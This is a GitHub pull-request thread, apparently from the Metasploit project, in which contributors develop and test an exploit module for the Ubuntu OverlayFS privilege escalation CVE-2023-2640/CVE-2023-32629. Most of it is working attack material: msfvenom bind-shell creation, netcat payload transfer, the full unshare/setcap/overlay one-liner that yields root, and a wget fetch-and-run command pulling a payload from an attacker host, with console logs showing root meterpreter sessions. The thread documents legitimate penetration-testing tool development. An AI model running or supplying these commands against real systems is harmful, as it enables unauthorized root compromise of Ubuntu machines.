CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privillege Escalation

[gardnerapp]

This module was originally suggested by #18765 and builds on this PoC from @g1vi. CVE-2023-2640 and CVE-2023-32629 allow for privilege escalation on Ubuntu systems due to a failure to call vfs_setxattr during execution of ovl_do_setxattr, this results in the failure to sanitize file capabilities during file system union process. This article explains the technical details of the vulnerability much better then I can and also provides a convenient list of vulnerable Ubuntu and Kernel versions.

This exploit was tested on Ubuntu Focal Fossa 20.04.6 with a 5.4.0-1018-aws kernel. I changed the Kernel version by following this tutorial , the google drive doc linked in the video is probably quicker to read. Please note that I used a bind shell to connect to the system, and a bind shell as a payload for the exploit. I am well aware that bind shells are frowned upon IRL because of firewalls, IDS, etc. I only had to use one because I don't have access to a Linux System outside of the cloud.

Verification

1, Target System

ubuntu@ubuntu ~$ cat /etc/os-release && uname -a
NAME="Ubuntu"VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

2. Creating a bind shell
   msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=5555 -f elf -o bind.elf

3. Transfer the bind shell
   I used netcat
   On remote machine: nc -lvnp 1234 > bind.elf
   Local machine cat bind.elf > <REMOTE IPADDRESS> 1234

4. Execute the bind shell
   chmod +x bind.elf && ./bind.elf

5. Start msf and connect to bind shell

$ msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meteroreter/bind_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:5555
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 1 opened (172.16.227.214:52193 -> 54.158.170.60:5555) at 2024-09-13 09:48:31 -0400

meterpreter > shell
Process 9129 created.
Channel 1 created.
whoami
ubuntu
exit
meterpreter > bg
[*] Backgrounding session 1...

6. Running the exploit, I unfortunately also had to use a bind shell for this.

msf6 exploit(multi/handler) > use exploit/linux/local/game_overlay_privesc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set session 1 
session => 1
msf6 exploit(linux/local/game_overlay_privesc) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set lport 6666
lport => 6666
msf6 exploit(linux/local/game_overlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory /tmp/main/l
[*] Creating directory /tmp/main/u
[*] Creating directory /tmp/main/w
[*] Creating directory /tmp/main/m
[*] Creating directory to store payload: /tmp/main/
[*] Writing payload: /tmp/main/marv
[*] Starting new namespace, and running exploit...
[*] Running exploit: 'unshare -rm sh -c "cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system("chmod +x /tmp/main/marv && /tmp/main/marv")' ' 

false
[*] Command Stager progress - 100.00% done (747/747 bytes)
[*] Started bind TCP handler against :6666
[*] Exploit completed, but no session was created.

There is now a bind shell running on the system with root level privileges. On the remote system you can verify the listening port with ss -ano | grep 6666

7. Connect to the root bind shell

msf6 exploit(linux/local/game_overlay_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:6666
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 2 opened (172.16.227.214:52242 -> 54.158.170.60:6666) at 2024-09-13 09:53:31 -0400

meterpreter > shell
Process 9532 created.
Channel 1 created.
whoami
root

Here are some Pictures

Open bind port on target:

Process list after payload execution marv is meterpreter running as root

Exploit

[bwatters-r7]

@gardnerapp I wanted to let you know I started working on this yesterday. It was super close, so I only did a couple minor changes and was able to get execution. I want to see if I can also get the ARCH_CMD payloads to work, since it is a command we're issuing and it should be straightforward 😆 . I hope I can get a PR to you with suggestions sometime today (US time).

Also, I was able to get a local VM to be vulnerable by downloading Ubuntu 22.04x64 and running:

sudo apt update
sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
reboot

I did it immediately and then took the VM offline in case it was silently patched.

[bwatters-r7]

@gardnerapp This was a super neat exploit- Thank you for submitting it! It was very close to working, and I was able to get it to work with both binary and ARCH_CMD payloads with just a bit of tweaking.

I tried to leave suggested changes, but if I missed something, I put up a working version here:

https://github.com/bwatters-r7/metasploit-framework/blob/cve-2023-32629/modules/exploits/linux/local/gameoverlay_privesc.rb

Here it is using both binary and ARCH_CMD payloads targets:

msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS Codename = (Jammy Jellyfish)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/TIMMJsZ/
[*] Creating directory /tmp/TIMMJsZ/
[*] /tmp/TIMMJsZ/ created
[*] Creating directory /tmp/TIMMJsZ/JpDsTcJSHs/
[*] Creating directory /tmp/TIMMJsZ/JpDsTcJSHs/
[*] /tmp/TIMMJsZ/JpDsTcJSHs/ created
[*] Creating directory /tmp/TIMMJsZ/gvuIpvd/
[*] Creating directory /tmp/TIMMJsZ/gvuIpvd/
[*] /tmp/TIMMJsZ/gvuIpvd/ created
[*] Creating directory /tmp/TIMMJsZ/FZrdUUPoKwg/
[*] Creating directory /tmp/TIMMJsZ/FZrdUUPoKwg/
[*] /tmp/TIMMJsZ/FZrdUUPoKwg/ created
[*] Creating directory /tmp/TIMMJsZ/ZSwBHcRmY/
[*] Creating directory /tmp/TIMMJsZ/ZSwBHcRmY/
[*] /tmp/TIMMJsZ/ZSwBHcRmY/ created
[*] Writing payload: /tmp/TIMMJsZ/marv
[*] Starting new namespace, and running exploit...
[*] unshare -rm sh -c "cp /usr/bin/python3 /tmp/TIMMJsZ/JpDsTcJSHs/; setcap cap_setuid+eip /tmp/TIMMJsZ/JpDsTcJSHs/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/TIMMJsZ/JpDsTcJSHs/,upperdir=/tmp/TIMMJsZ/gvuIpvd/,workdir=/tmp/TIMMJsZ/FZrdUUPoKwg/ /tmp/TIMMJsZ/ZSwBHcRmY/ && touch /tmp/TIMMJsZ/ZSwBHcRmY/*; " && /tmp/TIMMJsZ/gvuIpvd/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod +x /var/tmp/bash && chmod +x /tmp/TIMMJsZ/marv && /var/tmp/bash -p -c /tmp/TIMMJsZ/marv &&  rm -rf /tmp/TIMMJsZ/JpDsTcJSHs/ /tmp/TIMMJsZ/ZSwBHcRmY/ /tmp/TIMMJsZ/gvuIpvd/ /tmp/TIMMJsZ/FZrdUUPoKwg/ /var/tmp/bash")'
[+] Deleted /tmp/TIMMJsZ/
[*] Meterpreter session 37 opened (10.5.135.201:4585 -> 10.5.132.129:41602) at 2024-09-27 20:21:47 -0500
[*] 

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 37

[*] 10.5.132.129 - Meterpreter session 37 closed.  Reason: User exit
msf6 exploit(linux/local/gameoverlay_privesc) > set target 1
target => 1
msf6 exploit(linux/local/gameoverlay_privesc) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp 
payload => cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Command to run on remote host: wget -qO ./IWtillzOhEDS http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w; chmod +x ./IWtillzOhEDS; ./IWtillzOhEDS &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS Codename = (Jammy Jellyfish)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/qowPTdD/
[*] Creating directory /tmp/qowPTdD/
[*] /tmp/qowPTdD/ created
[*] Creating directory /tmp/qowPTdD/aRZdFGYWbp/
[*] Creating directory /tmp/qowPTdD/aRZdFGYWbp/
[*] /tmp/qowPTdD/aRZdFGYWbp/ created
[*] Creating directory /tmp/qowPTdD/krILBcsetBfz/
[*] Creating directory /tmp/qowPTdD/krILBcsetBfz/
[*] /tmp/qowPTdD/krILBcsetBfz/ created
[*] Creating directory /tmp/qowPTdD/KahdTIAH/
[*] Creating directory /tmp/qowPTdD/KahdTIAH/
[*] /tmp/qowPTdD/KahdTIAH/ created
[*] Creating directory /tmp/qowPTdD/KqwYrX/
[*] Creating directory /tmp/qowPTdD/KqwYrX/
[*] /tmp/qowPTdD/KqwYrX/ created
[*] Starting new namespace, and running exploit...
[*] unshare -rm sh -c "cp /usr/bin/python3 /tmp/qowPTdD/aRZdFGYWbp/; setcap cap_setuid+eip /tmp/qowPTdD/aRZdFGYWbp/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/qowPTdD/aRZdFGYWbp/,upperdir=/tmp/qowPTdD/krILBcsetBfz/,workdir=/tmp/qowPTdD/KahdTIAH/ /tmp/qowPTdD/KqwYrX/ && touch /tmp/qowPTdD/KqwYrX/*; " && /tmp/qowPTdD/krILBcsetBfz/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod +x /var/tmp/bash && /var/tmp/bash -p -c \"wget -qO ./IWtillzOhEDS http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w; chmod +x ./IWtillzOhEDS; ./IWtillzOhEDS &\" rm -rf /tmp/qowPTdD/aRZdFGYWbp/ /tmp/qowPTdD/KqwYrX/ /tmp/qowPTdD/krILBcsetBfz/ /tmp/qowPTdD/KahdTIAH/ /var/tmp/bash")'
[*] Client 10.5.132.129 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.132.129 (Wget/1.21.2)
[+] Deleted /tmp/qowPTdD/
[*] 
[*] Meterpreter session 38 opened (10.5.135.201:4585 -> 10.5.132.129:57044) at 2024-09-27 20:23:05 -0500

meterpreter > getuid
Server username: root

[bwatters-r7]

@gardnerapp do you have the time to add documentation to this?
See #19460 (comment)

[gardnerapp]

I will try and get the documentation done by Friday!

[jvoisin]

Dumb question, but why those two architecture only? The exploit seems quite portable to me.

[bwatters-r7]

Absolutely. Those are the only ones we tested on. If I get a chance I'll try it out on a Ubuntu AARCH_64, which I think is the only other Ubuntu arch?

[bwatters-r7]

Now that you mention it, x86 is not supported by Ubuntu, anymore, so we should remove it.

[bwatters-r7]

Happy to add anything anyone wants to test and verify- I'll do AARCH_64. 🎉

[bwatters-r7]

AARCH64 does work:

[*] Meterpreter session 1 opened (10.5.135.201:4588 -> 10.5.132.149:60980) at 2024-10-02 16:27:35 -0500

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > use exploit/linux/local/gameoverlay_privesc 
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > set session 1
session => 1
msf6 exploit(linux/local/gameoverlay_privesc) > set target 0
target => 0
msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/gameoverlay_privesc) > show options

Module options (exploit/linux/local/gameoverlay_privesc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   PayloadFileName  pVmtuGOGXdO      yes       Name of payload
   SESSION          1                yes       The session to run this module on
   WritableDir      /tmp             yes       A directory where we can write files


Payload options (linux/aarch64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux_Binary



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/UqNFkc/
[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/
[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/
[*] Creating directory /tmp/UqNFkc/uKmqunqY/
[*] Creating directory /tmp/UqNFkc/pwFUmC/
[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO
[*] Starting new namespace, and running exploit...
[+] Deleted /tmp/UqNFkc/
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500
[*] 

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > 

[gardnerapp]

For some reason the Linux Binary payload was no longer working. I added include Msf::Exploit::Exe and have successful test for binary payloads:

use exploit/multi/handler
[*] Using configured payload linux/x64/meterpreter/bind_tcp
runmsf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.173.113.139:5555
[*] Sending stage (3045380 bytes) to 54.173.113.139
[*] Meterpreter session 7 opened (192.168.0.239:49861 -> 54.173.113.139:5555) at 2024-10-15 10:40:53 -0400

meterpreter > bg
[*] Backgrounding session 7...
msf6 exploit(multi/handler) > use exploit/linux/local/gameoverlay_privesc 
[*] Using configured payload linux/x64/meterpreter/bind_tcp
rmsf6 exploit(linux/local/gameoverlay_privesc) > run

[-] Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/gameoverlay_privesc) > set session 7
session => 7
rumsf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory to store payload: /tmp/fQUjBSq/
[*] Creating directory /tmp/fQUjBSq/
[*] Creating directory /tmp/fQUjBSq/aBbfZQAtd/
[*] Creating directory /tmp/fQUjBSq/ipGtJZ/
[*] Creating directory /tmp/fQUjBSq/lhwOKOXG/
[*] Creating directory /tmp/fQUjBSq/RtMgBtIyVpn/
[*] Writing payload: /tmp/fQUjBSq/marv
[*] 
[*] Started bind TCP handler against 54.173.113.139:4444
[*] Sending stage (3045380 bytes) to 54.173.113.139
[+] Deleted /tmp/fQUjBSq/
[*] Meterpreter session 8 opened (192.168.0.239:49872 -> 54.173.113.139:4444) at 2024-10-15 10:41:31 -0400

meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > getuid
Server username: root

Additionally I've added randomization to the bash copy, it appears to be running properly but I couldn't fully test it due to hardware issues. I'm running the exploit against cloud based systems and cmd payloads are only supported with a dropper. If someone could test cmd targets that would help !

**

**

[bwatters-r7]

Hey there, @gardnerapp; I am sorry I let this fall by the wayside, and I want to get this merged and landed because it is pretty darn cool. Is there a reason you included the netcat binary in this?

[bwatters-r7]

Also, I want to get #19528 landed so we can use it for the command execution.

[gardnerapp]

Hey there, @gardnerapp; I am sorry I let this fall by the wayside, and I want to get this merged and landed because it is pretty darn cool. Is there a reason you included the netcat binary in this?

Not sure why I committed NC, pretty sure it was by accident. Just removed it.